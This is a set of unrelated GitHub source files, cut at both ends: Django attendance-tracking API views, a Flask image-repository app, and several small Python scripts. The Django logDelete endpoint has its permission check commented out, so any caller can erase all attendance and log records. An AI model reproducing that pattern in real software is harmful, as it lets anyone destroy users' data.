minutes\n start_minutes = user.start_time.hour*60 + user.start_time.minute\n end_minutes = user.end_time.hour*60 + user.end_time.minute\n if minutes > end_minutes - start_minutes:\n attendance.attendance_status = 'PRESENT'\n else:\n attendance.attendance_status = 'ABSENT' \n attendance.is_completed = True \n attendance.save() \n log = Logs(logid = attendance, type = 0, active_time = minutes)\n log.save()\n resp = {'message': 'Have a nice time, ' + request.user.first_name}\n return Response(resp)\n else:\n resp = {'message': 'Please logout on or after ' + str(user.end_time)}\n return Response(resp)\n \n\nclass iLogin(APIView):\n \"\"\"\n Intermediate login\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n resp = {'message': 'Your workday has not started. Please login.'}\n return Response(resp)\n else:\n # user = User.objects.get(username = request.user.username)\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n if attendance.is_completed == True:\n resp = {'message': 'Logged out for the day.'}\n return Response(resp)\n logs = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n if logs.type == 0:\n log = Logs(logid = attendance, type = 1)\n log.save()\n resp = {'message': 'Welcome back, ' + request.user.first_name}\n attendance.attendance_status = 'WORKING'\n attendance.total_logins += 1\n attendance.save()\n return Response(resp)\n else:\n resp = {'message': 'You are already logged in, ' + request.user.first_name}\n return Response(resp)\n\nclass iLogout(APIView):\n \"\"\"\n Intermediate logout\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n resp = {'message': 'Your workday has not started. 
Please login.'}\n return Response(resp)\n else:\n # user = User.objects.get(username = request.user.username)\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n if attendance.is_completed == True:\n resp = {'message': 'Logged out for the day.'}\n return Response(resp)\n logs = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n if logs.type == 1:\n minutes = 0\n ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n ptime = logs.time.hour*60 + logs.time.minute\n minutes = ctime - ptime\n minutes += int(logs.active_time)\n attendance.total_logouts += 1\n attendance.active_window = minutes\n attendance.attendance_status = 'BREAK'\n attendance.save()\n log = Logs(logid = attendance, type = 0)\n log.save()\n resp = {'message': 'Take a break, ' + request.user.first_name}\n return Response(resp)\n else:\n resp = {'message': 'You are already in break-time, ' + request.user.first_name}\n return Response(resp)\n\nclass userLogs(generics.ListAPIView):\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request, format=None):\n \"\"\"\n This view should return a list of all the logs\n for the currently authenticated user.\n \"\"\"\n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n user = self.request.user.id\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = date)\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n\n login = Logs.objects.filter(logid__user__pk=user, logid__date = date, type = True).values_list('time')\n logout = Logs.objects.filter(logid__user__pk=user, logid__date = date, type = False).values_list('time')\n login_list = []\n for x in range(len(login)):\n login_list.append(login[x][0])\n logout_list = []\n for x in range(len(logout)):\n logout_list.append(logout[x][0])\n log_list = {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}\n\n return Response(log_list)\n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n\nclass allLogs(APIView):\n \"\"\"\n All user logs\n \"\"\"\n permission_classes = [IsAdminUser]\n\n def get(self, request, format=None):\n \"\"\"\n This view should return a list of all the logs\n for the currently authenticated user.\n \"\"\"\n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n try:\n all_attendance = Attendance.objects.filter(date = date)\n log_list = {}\n for attendance in all_attendance:\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n\n login = Logs.objects.filter(logid__user__pk=attendance.user.id, logid__date = date, type = True).values_list('time')\n logout = 
Logs.objects.filter(logid__user__pk=attendance.user.id, logid__date = date, type = False).values_list('time')\n login_list = []\n for x in range(len(login)):\n login_list.append(login[x][0])\n logout_list = []\n for x in range(len(logout)):\n logout_list.append(logout[x][0])\n # log_list = {attendance.user.id : {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}}\n log_list.update({attendance.user.id : {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}})\n return Response(log_list)\n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n\nclass logDelete(APIView):\n \"\"\"\n Clear Attendance and Logs tables\n \"\"\"\n # permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n Attendance.objects.all().delete()\n Logs.objects.all().delete()\n resp = {'message': 'Flushed Logs and Attendance records.'}\n return Response(resp)\n\nclass changeWW(APIView):\n \"\"\"\n View to change start_time and end_time\n \"\"\"\n permission_classes = [IsAuthenticated]\n \n def post(self, request, format=None): \n try:\n start = datetime.datetime.strptime(self.request.GET['start'], '%H:%M:%S')\n end = datetime.datetime.strptime(self.request.GET['end'], '%H:%M:%S')\n except:\n resp = {'message': 'start_time and end_time parameters not found.'}\n return Response(resp)\n else:\n user = User.objects.get(pk = request.user.id)\n user.start_time = start\n user.end_time = end\n user.save()\n start_minutes = start.hour*60 + start.minute\n end_minutes = end.hour*60 + end.minute\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n attendance.working_window = end_minutes - start_minutes\n attendance.save()\n resp = {'message': 'Time window updated.'}\n return Response(resp)\n\nclass downloadReport(APIView):\n \"\"\"\n View to download login session report in excel format\n \"\"\"\n permission_classes = [IsAdminUser]\n \n def get(self, request, format=None): \n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n try:\n all_attendance = Attendance.objects.filter(date = date)\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = f\"attachment; filename={self.request.GET['date']}.xlsx\"\n book = Workbook(response, {'in_memory': True})\n sheet = book.add_worksheet('Logs') \n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n else:\n headlist = ['User ID', 'No of logins', 'No of logouts', 'Final status', 'Fixed start time', 'Fixed end time', 'Working window', 'Cummulative login session']\n for x in range(len(headlist)):\n sheet.write(0, x, headlist[x])\n\n row = 1\n for attendance in all_attendance:\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n col = 0\n for keys in userDetails:\n sheet.write(row, col, userDetails[keys])\n col += 1\n row += 1\n book.close()\n return response\n\nclass uploadWW(APIView):\n \"\"\"\n View to bulk upload user login and logout times\n \"\"\"\n 
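    # The POST handler below expects the same sheet that this GET template
    # produces: sheet name "Logs" with the header row
    #   User ID | Start time | End time
    # followed by one row per user, times formatted as %H:%M:%S
    # (e.g. 12 | 09:00:00 | 17:30:00 -- example values only).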
permission_classes = [IsAdminUser]\n    \n    def get(self, request, format=None): \n        response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n        response['Content-Disposition'] = \"attachment; filename=upload.xlsx\"\n        book = Workbook(response, {'in_memory': True})\n        sheet = book.add_worksheet('Logs') \n\n        headlist = ['User ID', 'Start time', 'End time']\n        for x in range(len(headlist)):\n            sheet.write(0, x, headlist[x])\n        book.close()\n        return response \n\n    def post(self, request, format=None): \n        \n        excel_file = request.FILES[\"excel_file\"]\n\n        # you may put validations here to check extension or file size\n\n        wb = openpyxl.load_workbook(excel_file)\n\n        # getting a particular sheet by name out of many sheets\n        worksheet = wb[\"Logs\"]\n        # print(worksheet)\n\n        excel_data = list()\n        # iterating over the rows and\n        # getting value from each cell in row\n        cnt = 0\n        message = {}\n        valid = True\n        for row in worksheet.iter_rows():\n            row_data = list()\n            if cnt == 0:\n                row_cnt = 0\n                for cell in row:\n                    if str(cell.value) != 'User ID' and row_cnt == 0:\n                        valid = False\n                    elif str(cell.value) != 'Start time' and row_cnt == 1:\n                        valid = False\n                    elif str(cell.value) != 'End time' and row_cnt == 2:\n                        valid = False\n                    row_cnt += 1\n            elif cnt > 0 and valid == True:\n                try:\n                    user = User.objects.get(pk = row[0].value)\n                except:\n                    message.update({f'UserID {row[0].value}': 'User not available'})\n                else:\n                    try:\n                        attendance = Attendance.objects.get(user__pk = row[0].value, date = datetime.date.today())\n                    except:\n                        pass\n                    row_cnt = 0\n                    for cell in row:\n                        row_data.append(str(cell.value))\n                        if row_cnt == 1:\n                            start = datetime.datetime.strptime(str(cell.value), '%H:%M:%S')\n                            user.start_time = start\n                            start_minutes = start.hour*60 + start.minute\n                        elif row_cnt == 2:\n                            end = datetime.datetime.strptime(str(cell.value), '%H:%M:%S')\n                            user.end_time = end\n                            end_minutes = end.hour*60 + end.minute\n                            user.save()\n                            attendance.working_window = end_minutes - start_minutes\n                            attendance.save() \n                            message.update({f'User{row[0].value}': 'Time window updated.'}) \n                        row_cnt += 1 \n            else:\n                resp = {'message': 'Provide data in the right format.'}\n                return Response(resp)\n            excel_data.append(row_data)\n            cnt += 1\n        print(excel_data)\n        message.update({'message': 'Upload successful'})\n        return Response(message)","repo_name":"raymond-irudayaraj/corp_attendance_management","sub_path":"logs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5696651669","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 2 17:53:15 2022\r\n\r\n@author: henrique buzzi\r\n\"\"\"\r\n## Entradas\r\nx = 3 #Número de alunos mínimos presentes no horário da aula\r\ntempoChegada = [-2,-1,0,1,2] #Vetor com os tempos de chegada de cada aluno\r\n\r\n##Processamento\r\nfor chegada in tempoChegada: #Loop que passa por cada tempo de chegada\r\n    if(chegada>=0): #Se o tempo de chegada for maior ou igual a zero, o aluno estava presente no horário de começar a aula\r\n        x-=1 #Diminui em 1 o número de alunos necessários para garantir a Aula normal\r\n\r\nif(x<=0): #Se o número de alunos necessários tiver sido atingido ou até superado\r\n    print('Aula Normal') #Aula normal\r\nelse: #Se não atingiu o número necessário\r\n    print('Aula Cancelada') #Aula 
cancelada","repo_name":"h-buzzi/desafio-warren","sub_path":"desafio-2/desafio-2.py","file_name":"desafio-2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8029252741","text":"from wordfreq import zipf_frequency\n\nfiltered = open(\"filtered.txt\", \"w\")\nnon_filtered = open(\"non_filtered.txt\", \"w\")\n\n\nwith open(\"swe_wordlist_5.txt\") as file:\n words = file.readlines()\n words = [line.rstrip() for line in words]\n for word in words:\n if zipf_frequency(word, 'sv') >= 3:\n filtered.write(word + \"\\n\")\n else:\n non_filtered.write(word + \"\\n\")\n\nfiltered.close()\nnon_filtered.close()\n","repo_name":"himynameisjonas/ordsnille","sub_path":"scraper/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23660966539","text":"import json\nimport sqlite3\nimport flask\n\n\ndb_file = r'fxh.db'\n\n\"\"\"\n表结构\n (id int, dataID int, forumID int, webName text, forumName text,\n topicID text, topicTitle text,\ttopicLink text, author text,\n pubTime text, authorLink text, replyNum int, viewNum int,\n lastReplier text, lastReplyTime text, lastReplierLink text, \n topicContent text, spiderDate text, spiderTime text, \n SYSspiderTime text, mediaType text, Dlevel int, isManu int,\n DTopicKind int, effectIndex int, DlevelKey text,\talexa int,\n remark text,\txid int)''') \n\n\"\"\"\n#媒体类型\ndef CountByMediaType():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT mediaType, count(ID) as num FROM articles group by mediaType')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\nCountByMediaType()\n\n#媒体名称\ndef CountByWebName():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT webName, count(ID) as num FROM articles group by webName order by count(ID) desc limit 30')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\n#时间序列\ndef CountByDate():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT date(pubTime), count(ID) as num FROM articles group by date(pubTime) order by date(pubTime) ')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\nCountByDate()\n\n\n\ndef getArticles(currPage=0, pageSize=10):\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n \n #获得所有记录总数\n \n c.execute('SELECT count(*) FROM articles')\n rs = c.fetchone()\n \n rowsCount = rs[0] \n #print(rowsCount) \n \n c.execute('SELECT ID,mediaType,webName,topicTitle,author,topicLink,pubTime,DtopicKind,viewNum,replyNum FROM articles limit ' + str(pageSize) + ' offset ' + str((currPage -1)*pageSize))\n rs = c.fetchall()\n \n \n data = []\n for r in rs: \n d = {}\n d['id'] = r[0]\n d['mediaType'] = r[1]\n d['webName'] = r[2]\n d['topicTitle'] = r[3]\n d['author'] = r[4] \n d['topicLink'] = r[5]\n d['pubTime'] = r[6]\n d['DtopicKind'] = r[7]\n d['viewNum'] = r[8]\n d['replyNum'] = r[9]\n \n \n data.append(d)\n conn.close()\n\n #去掉前后的 []\n jsonStr = json.dumps(data)\n \n jsonStr = '{\"total\":' + str(rowsCount) + ',\"rows\":' + jsonStr + '}'; \n \n return jsonStr\n #return jsonStr[1:-1]\n \n #return rs\n #return(json.dumps(rs))\n\n\ngetArticles(1,2)\n\n","repo_name":"leiyu/fxh","sub_path":"dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908457150","text":"#Kalind 
Ramnarayan\r\n#23 April 2014\r\n#voting simulation\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\n\r\nvotelist=[] #Create a list\r\nstring=input(\"Enter the names of parties (terminated by DONE):\\n\")\r\nwhile string!=\"DONE\": # add strings to the list\r\n votelist.append(string)\r\n string=input()\r\n \r\npartylist=[]\r\n\r\nfor i in votelist:\r\n if not i in partylist:\r\n partylist.append(i)\r\n \r\nx=partylist.sort()\r\n\r\nprint()\r\nprint(\"Vote counts:\")\r\ngap=\" \"\r\nfor i in partylist :\r\n print(i,gap*(9-len(i)),\"-\",votelist.count(i))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/rmnkal001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15510269319","text":"from wtforms import form\r\nfrom werkzeug.utils import secure_filename\r\nimport Forms\r\nfrom config import *\r\nfrom flask import Flask, redirect, request, render_template, session, jsonify, flash\r\nfrom modelos import BD\r\nfrom modelos import Usuario, Repositorio, Imagen\r\nimport os\r\n\r\n#MIDDLEWARE PARA LA CREACIÓN DE DIRECTORIO PARA LAS IMÁGENES EN CASO DE NO EXISTIR#\r\ndef GenerarDirectorio():\r\n cwd = os.getcwd()\r\n ruta = os.path.join(cwd, 'public', 'assets/imagenes')\r\n\r\n if(os.path.isdir(ruta)):\r\n print(\"El directorio ya existe.\")\r\n else:\r\n print('Creando directorio...')\r\n os.mkdir(ruta)\r\n\r\n\r\n#INSTANCIA DE LA APLICACIÓN DE FLASK#\r\napp = Flask(__name__, static_folder = 'public/', static_url_path='/', template_folder='public/views')\r\napp.config.from_object(DevelopmentConfig)\r\n\r\n#SI OCURRE UN ERROR DE 404, SE ENVÍA UN MENSAJE AL USUARIO#\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n return \"Error 404. Recurso no encontrado.\"\r\n\r\n#PÁGINA PRINCIPAL DE LA APLICACIÓN#\r\n@app.route('/', methods = ['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n#VALIDACIÓN DE RUTAS(VERIFICACIÓN DE SESIÓN)#\r\n\r\n@app.before_request\r\ndef ValidarSesion():\r\n if 'idU' not in session and request.endpoint not in ['index','Registro', 'InicioSesion', 'static']:\r\n print('No está en sesión.', request.endpoint);\r\n mensaje = \"No está autenticado. Por favor, inicie sesión pulsando el botón para iniciar sesión\"\r\n flash(mensaje)\r\n return redirect('/')\r\n\r\n@app.after_request\r\ndef SesionValidada(respuesta):\r\n return respuesta\r\n\r\n\r\n\r\n#FIN VALIDACIÓN DE RUTAS#\r\n\r\n#REGISTRO Y AUTENTICACIÓN DE USUARIOS EN LA APLICACIÓN#\r\n@app.route('/Registro',methods = ['GET', 'POST'])\r\ndef Registro():\r\n RegistroUF = Forms.FormularioRegistro(request.form)\r\n if request.method == 'POST' and RegistroUF.validate():\r\n Cuenta = Usuario.query.filter_by(email = RegistroUF.email.data).first()\r\n print(request.method, Cuenta)\r\n if Cuenta is None:\r\n\r\n #SE CREA EL NUEVO USUARIO SI TODOS LOS DATOS SON CORRECTOS.\r\n NuevoU = Usuario(nombre = RegistroUF.nombre.data,\r\n apellido = RegistroUF.apellido.data,\r\n email = RegistroUF.email.data,\r\n clave = RegistroUF.clave.data)\r\n\r\n BD.session.add(NuevoU)\r\n BD.session.commit()\r\n\r\n\r\n print(RegistroUF.email.data)\r\n mensaje = \"¡Su cuenta ha sido creada con éxito! Por favor, inicie sesión\"\r\n flash(mensaje)\r\n return redirect('/')\r\n\r\n else:\r\n mensaje = \"El email ingresado ya está en uso. 
Por favor, ingrese uno diferente.\"\r\n flash(mensaje)\r\n return redirect('/Registro')\r\n\r\n\r\n return render_template('Registro.html', form = RegistroUF)\r\n\r\n\r\n@app.route('/IniciarSesion', methods = ['GET', 'POST'])\r\ndef InicioSesion():\r\n FormularioInicioSesion = Forms.FormularioInicioS(request.form)\r\n\r\n if request.method == 'POST' and FormularioInicioSesion.validate():\r\n EmailU = FormularioInicioSesion.email.data\r\n ClaveU = FormularioInicioSesion.clave.data\r\n print(\"La clave que ingresó el usuario es: \", ClaveU)\r\n\r\n #SE VALIDAN LAS CREDENCIALES#\r\n\r\n Usuario_Sesion = Usuario.query.filter_by( email = EmailU).first()\r\n if Usuario_Sesion is not None and Usuario_Sesion.ValidarClave(ClaveU):\r\n session['idU'] = Usuario_Sesion.id\r\n session['email'] = EmailU\r\n session['nombre'] =Usuario_Sesion.nombre\r\n return redirect('/Inicio', )\r\n else:\r\n mensaje = \"Email o contraseña incorrectas, por favor, verifique sus datos.\"\r\n flash(mensaje)\r\n return redirect('/IniciarSesion')\r\n \r\n return render_template('InicioSesion.html', form = FormularioInicioSesion)\r\n\r\n@app.route('/Salir', methods = ['GET'])\r\ndef CerrarSesion():\r\n if 'email' in session:\r\n session.pop('email');\r\n session.pop('nombre');\r\n session.pop('idU');\r\n return redirect('/');\r\n\r\n#FIN DE REGISTRO Y AUTENTICACIÓN DE USUARIOS#\r\n\r\n\r\n#USUARIO Y CREACIÓN DE REPOSITORIOS-IMÁGENES\r\n\r\n@app.route('/Usuarios/VerPerfil')\r\ndef VerPerfil():\r\n return render_template('PerfilUsuario.html')\r\n\r\n#VISUALIZAR LOS DATOS DEL USUARIO#\r\n@app.route('/Usuarios/MostrarDatosU', methods = ['GET'])\r\ndef MostrarDatos():\r\n id_Usuario = session.get('idU')\r\n DatosUsuario = Usuario.query.filter_by(id = id_Usuario).first()\r\n ReposUsuario = Repositorio.query.filter_by(idUsuario = session.get('idU')).all()\r\n Repos_Usuario = []\r\n\r\n #SE UBICAN LOS REPOSITORIOS QUE SON PROPIEDAD DEL USUARIO#\r\n for repo in ReposUsuario:\r\n datos_repo = {\r\n \"idRepo\" : repo.idRepo,\r\n \"idUsuario\" : repo.idUsuario,\r\n \"nombre_repo\" : repo.nombre_repo\r\n }\r\n Repos_Usuario.append(datos_repo)\r\n \r\n return jsonify({\"estado\": 200, \"NombreU\": DatosUsuario.nombre, \"ApellidoU\": DatosUsuario.apellido, \"EmailU\": DatosUsuario.email, \"Repos\": Repos_Usuario}), 200\r\n\r\n#CREAR UN NUEVO REPOSITORIO#\r\n@app.route('/CrearRepositorio', methods = ['GET', 'POST'])\r\ndef DespachoFormularioCol():\r\n ColFormulario = Forms.FormularioRepositorios(request.form)\r\n\r\n if request.method == 'POST' and ColFormulario.validate():\r\n print('El nombre del repo es: ', ColFormulario.nombre.data)\r\n NuevoRepo = Repositorio(session.get('idU'), ColFormulario.nombre.data)\r\n BD.session.add(NuevoRepo)\r\n BD.session.commit()\r\n\r\n return redirect('/Usuarios/VerPerfil')\r\n\r\n return render_template('CrearRepositorio.html', form = ColFormulario)\r\n\r\n#VISUALIZAR UN REPOSITORIO ESPECÍFICO#\r\n@app.route('/VerRepositorio/<idR>', methods=['GET'])\r\ndef VerRepositorio(idR):\r\n print('el id del repositorio es: ', idR)\r\n\r\n DatosRepo = Repositorio.query.filter_by(idRepo = idR).first()\r\n ImagenesRepo = Imagen.query.filter_by(idRepo = idR).all()\r\n print('Las imagenes de este repositorio son: ', ImagenesRepo)\r\n\r\n imagenes_repo = []\r\n\r\n for i in ImagenesRepo:\r\n datosImagen = {\r\n \"idImagen\" : i.idImagen,\r\n \"idRepo\" : i.idRepo,\r\n \"nombre_img\" : i.nombre_img,\r\n \"autor\" : i.autor,\r\n \"tags\" : i.tags,\r\n \"url\" : i.url \r\n }\r\n imagenes_repo.append(datosImagen) \r\n \r\n 
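        # imagenes_repo is now a plain list of dicts, one per image, e.g.
        # [{"idImagen": 1, "idRepo": 3, "nombre_img": "atardecer", "autor": "Ana",
        #   "tags": "playa", "url": "/assets/imagenes/atardecer.jpg"}, ...]
        # (illustrative values only), ready to embed in the Resultado payload below.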
print(imagenes_repo)\r\n Resultado = {\r\n \"nombre_repo\" : DatosRepo.nombre_repo,\r\n \"idRepo\" : DatosRepo.idRepo,\r\n \"idUsuario\" : DatosRepo.idUsuario,\r\n \"imagenes\" : imagenes_repo\r\n }\r\n \r\n print(Resultado)\r\n return render_template('VerRepo.html', datos = Resultado, emailUsuario = session.get('email'), nombreUsuario = session.get('nombre'))\r\n\r\n#ELIMINAR UN REPOSITORIO#\r\n@app.route('/BorrarRepositorio/<id>', methods = ['DELETE'])\r\ndef BorrarRepositorio(id):\r\n print(id)\r\n Repo = Repositorio.query.filter_by(idRepo = id).first()\r\n BD.session.delete(Repo)\r\n BD.session.commit()\r\n return \"Ok\"\r\n\r\n#AGREGAR IMÁGENES A UN REPOSITORIO#\r\n@app.route('/AgregarImagen/<idRepo>', methods = ['GET', 'POST'])\r\ndef AgregarImagen(idRepo):\r\n print(idRepo)\r\n \r\n \r\n if request.method == 'POST':\r\n print('Creando imagen...')\r\n #SE OBTIENE LA RUTA DEL ARCHIVO PARA GUARDARLA EN LA BD, Y SE ALMACENA EL ARCHIVO EN LA CARPETA#\r\n archivo = request.files['file']\r\n archivo.save(os.getcwd() + \"/public/assets/imagenes/\" + secure_filename(archivo.filename))\r\n url = \"/assets\"+\"/imagenes/\"+archivo.filename\r\n Nueva_img = Imagen(idRepo, request.form['titulo'], session.get('nombre'), url, request.form['tags'])\r\n #SE AGREGA LA IMAGEN CREADA A LA COLECCIÓN CORRESPONDIENTE#\r\n BD.session.add(Nueva_img)\r\n BD.session.commit()\r\n return redirect('/VerRepositorio/'+idRepo)\r\n\r\n return render_template('NuevaImagen.html', idRepo = idRepo)\r\n\r\n#ELIMINAR UNA IMAGEN#\r\n#SE REALIZA CON EL MÉTODO HTTP - GET PARA AHORRO DE ESCRITURA DE RUTAS#\r\n@app.route('/BorrarImagen/<id>', methods = ['GET'])\r\ndef BorrarImagen(id):\r\n print(id)\r\n BImagen = Imagen.query.filter_by(idImagen = id).first()\r\n BD.session.delete(BImagen)\r\n BD.session.commit()\r\n mensaje = \"La imagen ha sido borrada con éxito. 
Revise el repositorio pertinente para agregar nuevas imágenes.\"\r\n flash(mensaje)\r\n return redirect('/Usuarios/VerPerfil')\r\n\r\n#BÚSQUEDA DE PUBLICACIONES POR MEDIO DE LAS ETIQUETAS#\r\n@app.route('/ResultadosBusqueda/<Datos>', methods = ['GET'])\r\ndef ResultadosBusqueda(Datos):\r\n print(Datos)\r\n\r\n Resultados = Imagen.query.filter_by(tags = Datos).all()\r\n RespuestaBusqueda = []\r\n for imagen in Resultados:\r\n datos_imagen = {\r\n \"idImagen\" : imagen.idImagen,\r\n \"idRepo\" : imagen.idRepo,\r\n \"nombre_img\" : imagen.nombre_img,\r\n \"autor\" : imagen.autor,\r\n \"tags\" : imagen.tags,\r\n \"url\" : imagen.url\r\n }\r\n RespuestaBusqueda.append(datos_imagen)\r\n \r\n return render_template('Busqueda.html', imagen = RespuestaBusqueda, emailUsuario = session.get('email'), nombreUsuario = session.get('nombre') )\r\n\r\n#EDICIÓN DE USUARIOS#\r\n@app.route('/Usuarios/Editar', methods = ['GET'])\r\ndef Editar():\r\n FormularioEdicion = Forms.FormularioRegistro(request.form)\r\n\r\n return render_template('EditarUsuario.html', form = FormularioEdicion)\r\n\r\n@app.route('/Usuarios/EditarU', methods = ['PUT'])\r\ndef EditarU():\r\n FormularioEdicion = Forms.FormularioRegistro(request.form)\r\n print(FormularioEdicion.email.data)\r\n usuario = Usuario.query.filter_by(id = session.get('idU')).first()\r\n usuario.nombre = FormularioEdicion.nombre.data\r\n usuario.apellido = FormularioEdicion.apellido.data\r\n usuario.email = FormularioEdicion.email.data\r\n usuario.clave = FormularioEdicion.clave.data\r\n session['idU'] = usuario.id\r\n session['email'] = usuario.email\r\n session['nombre'] = usuario.nombre\r\n\r\n BD.session.commit()\r\n\r\n\r\n return \"Ok\"\r\n\r\n#ELIMINAR USUARIO#\r\n@app.route('/Usuarios/Borrar', methods = ['DELETE'])\r\ndef Borrar():\r\n BorrarUsuario = Usuario.query.filter_by(email = session.get('email')).first()\r\n BD.session.delete(BorrarUsuario)\r\n BD.session.commit()\r\n mensaje = \"Su cuenta ha sido eliminada con éxito.\"\r\n flash(mensaje)\r\n return \"Su cuenta ha sido eliminada con éxito.\"\r\n\r\n\r\n#DESPACHO DEL INICIO DE LA APLICACIÓN UNA VEZ AUTENTICADO#\r\n\r\n@app.route('/Inicio', methods = ['GET'])\r\ndef DespachoInicio():\r\n UsuarioIdentificado = session.get('email')\r\n a = session.get('nombre')\r\n #BUSCAR TODAS LAS PUBLICACIONES#\r\n publicaciones = Imagen.query.all()\r\n Posts = []\r\n for i in publicaciones:\r\n datosImagen = {\r\n \"idImagen\" : i.idImagen,\r\n \"idRepo\" : i.idRepo,\r\n \"nombre_img\" : i.nombre_img,\r\n \"autor\" : i.autor,\r\n \"tags\" : i.tags,\r\n \"url\" : i.url \r\n }\r\n Posts.append(datosImagen)\r\n\r\n\r\n return render_template('InicioDupic.html', emailUsuario = UsuarioIdentificado, nombreUsuario = a, imagenes = Posts)\r\n\r\n\r\n###########################################################\r\n\r\nBD.init_app(app)\r\n\r\n\r\n# Iniciar servidor (ejecutar)\r\nif __name__ == '__main__':\r\n\r\n with app.app_context():\r\n BD.create_all()\r\n \r\n GenerarDirectorio()\r\n app.run()","repo_name":"CarlosV06/Dupic-webii","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11415,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2349990237","text":"from __future__ import annotations\nimport settings\nimport pyaudio\nimport wave\nimport collections\nimport math\nimport audioop\n\n\nclass AudioInput():\n\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n SAMPLE_RATE = 44100\n CHUNK_SIZE = 1024\n\n DEFAULT_RECORD_SECONDS = 5\n 
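    # With FORMAT = paInt16 and one channel, each sample is 2 bytes, so a
    # single CHUNK_SIZE read returns 1024 frames (~23 ms of audio at 44.1 kHz);
    # the RMS energy checks below recover that sample width via
    # pyaudio.get_sample_size(self.FORMAT).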
